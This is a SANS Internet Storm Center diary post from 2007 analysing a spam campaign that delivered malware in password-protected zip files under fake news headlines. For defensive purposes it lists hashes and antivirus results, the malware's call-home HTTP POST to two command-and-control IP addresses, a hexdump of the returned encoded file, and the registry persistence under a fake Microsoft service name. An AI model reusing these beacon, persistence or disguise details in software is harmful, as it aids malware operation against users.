New Malware SPAM - SANS Internet Storm Center

Participate: Learn more about our honeypot network
https://isc.sans.edu/tools/honeypot/

Handler on Duty: Didier Stevens

Threat Level: green

New Malware SPAM
One of our readers (thanks Michael) reported receiving a passoword protected zip file as SPAM with the password included in the HTML body of the email. The SPAM From: line may show a news organization. However the actual sources of the email is all over the map. Hopefully most people have been trained to not trust the From: line or reply to spammy looking emails by now. Sample Subject Lines: Subject: Re: U.S. violent crime up again, more murders, robberies Subject: Man Awakens From 19-Year Coma Subject: Law hits Las Vegas 'fake' bands Several of the samples included body text such as: Decade Of Mystery: John Ramsey Speaks Man wakes from 19-year coma in Poland US vows to pursue hunt for missing soldiers Password for submitted attachment is xxx Attachments include names such as "<news organization>-news<digits>.zip" At the moment AV coverage (of the uncompressed file) is spotty File size: 40960 bytes MD5: efff306b3296b18a94fea8491b960ab0 SHA1: 11afce9edf86386f0383bd162cff428a7fdf27bd packers: UPX AhnLab-V3 2007.5.31.2 06.04.2007 no virus found AntiVir 7.4.0.29 06.04.2007 no virus found Authentium 4.93.8 05.23.2007 no virus found Avast 4.7.997.0 06.04.2007 Win32:Agent-GPS AVG 7.5.0.467 06.03.2007 no virus found BitDefender 7.2 06.04.2007 no virus found CAT-QuickHeal 9.00 06.04.2007 no virus found ClamAV devel-20070416 06.04.2007 no virus found DrWeb 4.33 06.04.2007 no virus found eSafe 7.0.15.0 06.04.2007 suspicious Trojan/Worm eTrust-Vet 30.7.3690 06.04.2007 no virus found Ewido 4.0 06.04.2007 no virus found FileAdvisor 1 06.04.2007 no virus found Fortinet 2.85.0.0 06.02.2007 suspicious F-Prot 4.3.2.48 06.04.2007 no virus found F-Secure 6.70.13030.0 06.04.2007 no virus found Ikarus T3.1.1.8 06.04.2007 no virus found Kaspersky 4.0.2.24 06.04.2007 no virus found McAfee 5045 06.04.2007 no virus found Microsoft 1.2503 06.04.2007 no virus found NOD32v2 2307 06.04.2007 no virus found Norman 5.80.02 06.04.2007 no virus found Panda 9.0.0.4 06.04.2007 no virus found The binary once executed appears to callhome via an HTTP POST to at least one of two websites: 216.40.204.106 ev1s-216-40-204-106.ev1servers.net AS \| IP \| BGP Prefix \| CC \| Registry \| Allocated \| AS Name 13749 \| 216.40.204.106 \| 216.40.192.0/20 \| US \| arin \| 2000-10-05 \| EVERYONES-INTERNET - Everyones Internet 74.52.72.58 3a.48.344a.static.theplanet.com AS \| IP \| BGP Prefix \| CC \| Registry \| Allocated \| AS Name 21844 \| 74.52.72.58 \| 74.52.0.0/16 \| US \| arin \| 2006-02-17 \| THEPLANET-AS - THE PLANET Here are the partially sanitized details from one such call home: POST /forum.php HTTP/1.1 Host: 216.40.204.106:80 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Accept: / Accept-Language: en Accept-Encoding: deflate Cache-Control: no-cache Content-Type: multipart/form-data; boundary=4AFEAB473A5F7 Content-Length: 587 --4AFEAB473A5F7 Content-Disposition: form-data; name="sid" 1731421623279576 --4AFEAB473A5F7 Content-Disposition: form-data; name="up" 415735 --4AFEAB473A5F7 Content-Disposition: form-data; name="wbfl" 1 --4AFEAB473A5F7 Content-Disposition: form-data; name="v" 243 --4AFEAB473A5F7 Content-Disposition: form-data; name="ping" 768 --4AFEAB473A5F7 Content-Disposition: form-data; name="guid" {BDDC89D0-27C5-449C-AD5C-6FCF1C875D65} --4AFEAB473A5F7 Content-Disposition: form-data; name="wv" 5#2#2#0#2600#0 --4AFEAB473A5F7-- In response to this post the webserver returns a binary file: HTTP/1.1 200 OK Date: Mon, 04 Jun 2007 17:22:01 GMT Server: Apache/2.2.4 (Win32) DAV/2 mod_ssl/2.2.4 OpenSSL/0.9.8e mod_autoindex_color PHP/5.2.1..X-Powered-By: PHP/5.2.1 Content-Length: 260 Connection: close Content-Type: multipart/form-data; boundary="4AFEAB473A5F7" --4AFEAB473A5F7 Content-Disposition: form-data; name="COMMON"; filename="COMMON.BIN" Content-Type: application/octet-stream 0d0a 2768 727f 252d 2e2d 2a2e 2928 2c2a ..'hr.%-.-.)(, 2a22 2b28 292d 2a27 3468 727f 2511 2779 "+()-'4hr.%.'y 7774 7870 2511 276d 2511 292f 2b11 2734 wtxp%.'m%.)/+.'4 6d25 1127 6825 112c 2f35 2e29 352c 2935 m%.'h%.,/5.)5,)5 2e23 2123 2b16 1129 2a2d 352f 2b35 292b .#!#+..)-5/+5)+ 2f35 2a2b 2d21 232b 1127 3468 2511 2734 /5+-!#+.'4h%.'4 7977 7478 7025 ywtxp% --4AFEAB473A5F7-- I have included the hexdump of COMMON.BIN unsanitized above for anyone wanting to take it apart (and please submit your analysis to our contact page if you would). Possibly an encoded config file. Here are the system modification details: Creates file C:\WINDOWS\ws386.ini. Creates file C:\WINDOWS\s32.txt. Creates key "HKLM\System\CurrentControlSet\Services\aspimgr". Sets value "ImagePath"="C:\WINDOWS\SYSTEM\aspimgr.exe" in key "HKLM\System\CurrentControlSet\Services\aspimgr". Sets value "DisplayName"="Microsoft ASPI Manager" in key "HKLM\System\CurrentControlSet\Services\aspimgr". Creates key "HKLM\Software\Microsoft\Sft". Sets value "default"="{00000000-0000-0000-0000-00003F000F00}" in key "HKLM\Software\Microsoft\Sft". In addition to our readers that submitted information I'd also like to thank the excellent analysis results from Anubis, Norman, and Sunbelt	Robert 49 Posts Jun 4th 2007
Thread locked Subscribe	Jun 4th 2007 1 decade ago